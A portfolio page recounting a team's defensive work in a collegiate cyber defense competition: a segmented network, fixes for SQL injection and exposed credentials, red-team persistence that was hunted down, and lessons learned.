Dec 6, 2025 • Cyber Defense Competition

ISEAGE C3 Fall 2025 CDC

Explore Event ICDC Spring 2026

2nd

Place

Out of 10+ competing teams

0 .20

Final Score

Total competition score

0 .8%

Service Availability

Uptime maintained under attack

Systems Defended

Over 8 hours of active red team attacks

Competition Overview

The scenario was a fictional TV news station whose infrastructure had already been compromised. The job was not to prevent an attack that had already happened, but to find what was left behind, fix it, and hold the line against an active red team for 8 hours.

Drake's 8-person team placed 2nd out of 10+ at ISEAGE C3 Fall 2025, finishing with a 717.20 score and 93.8% service availability across 7 systems under continuous attack. The white team documentation score hit 93/100 — thorough incident reporting while the network was still under fire.

The network ran in three tiers: MGMT for privileged access and monitoring, INTERNAL for Active Directory and core services, and UNTRUSTED as the DMZ facing simulated internet and red team external attacks. OPNsense enforced the zone boundaries.

Network Architecture

MGMT Zone

Management network holding the OPNsense admin interface, monitoring hosts, and privileged workstations. Access locked to whitelisted IPs. If red team got here, the game was over.

INTERNAL Zone

Core business infrastructure: Windows Server 2019 with Active Directory, the Go API backend, MySQL databases, and file servers. Fully isolated from UNTRUSTED by OPNsense zone rules.

UNTRUSTED Zone

The DMZ. Public-facing Nuxt/Vue web app, mail server, and external API endpoints. This zone faced simulated internet traffic and all red team external attack vectors.

OPNsense Firewall

Central enforcement for all three zones with zone-to-zone rules, IDS/IPS, and full traffic logging. Default-deny policy with least-privilege allow rules written explicitly for each service.

Vulnerability Remediations

SQL Injection (CWE-89)

The Go API was concatenating unsanitized user input directly into SQL queries. Any request through the UNTRUSTED-zone endpoints could read or write the full MySQL database.

Fix. Replaced string concatenation with prepared statements and parameterized queries throughout the API. Added input validation middleware and WAF rules on OPNsense to catch SQLi patterns at the network boundary.

API Key Exposure (CWE-200)

Sensitive API keys were committed to the application repository and accessible through public configuration endpoints. Anyone who found the endpoint had valid credentials.

Fix. Rotated all exposed credentials immediately. Migrated secrets to environment variables, removed them from git history, and applied file permission controls to prevent configuration files from being publicly readable.

Broken Access Control (CWE-862)

Admin endpoints had no authorization checks. Any authenticated user, including low-privilege accounts, could access user management and system configuration functions.

Fix. Added role-based access control middleware to all admin routes. Enforced privilege separation through Active Directory group policy to ensure standard users and administrators can't reach each other's functions.

Hardcoded Credentials (CWE-798)

Default and hardcoded credentials across database accounts, service accounts, and network device admin interfaces. A red team that knew one default got access to several services simultaneously.

Fix. Full audit of all services for default credentials, forced rotation, Active Directory GPO password policy enforcement, and deactivation of every unused service account that didn't need to exist.

Threat Hunting Findings

Persistence Mechanisms

WMI Subscriptions Red team persistence via Event Consumers

Malicious Cron Jobs Reverse shell scheduled on Linux hosts

LD_PRELOAD Backdoors Shared library injection for privilege

PAM Misconfigs Modified PAM stack for auth bypass

Systems Defended

Windows Server 2019 Active Directory domain controller

Ubuntu / Debian Linux application servers

Nuxt / Vue Public-facing web application

Go API + MySQL Backend API and database

Scoring Breakdown

717.20 pts Total final score (2nd place)

93 / 100 White team documentation score

93.8% Service availability maintained

8 hours Active defense window

Key Learnings

When a live red team is actively poking your systems, triage becomes the entire game. Fixing the wrong thing first is worse than fixing nothing.

Priority triage under fire is a skill that can't be learned from labs. Deciding what to fix first when everything is broken simultaneously takes practice with real stakes.

WMI subscriptions, malicious cron jobs, LD_PRELOAD injections, and PAM modifications are invisible to most monitoring tools. You have to know where to look manually.

Network segmentation only works if the firewall rules are written correctly. A zone boundary with one misfire rule is the same as no boundary at all.

Documentation written during an active incident is more valuable than any post-mortem. The white team score proved that thorough real-time writing under pressure is a competitive advantage.

All Projects

Prev Project ISEAGE Intl. CDC

Next Project ISEAGE Spring 2026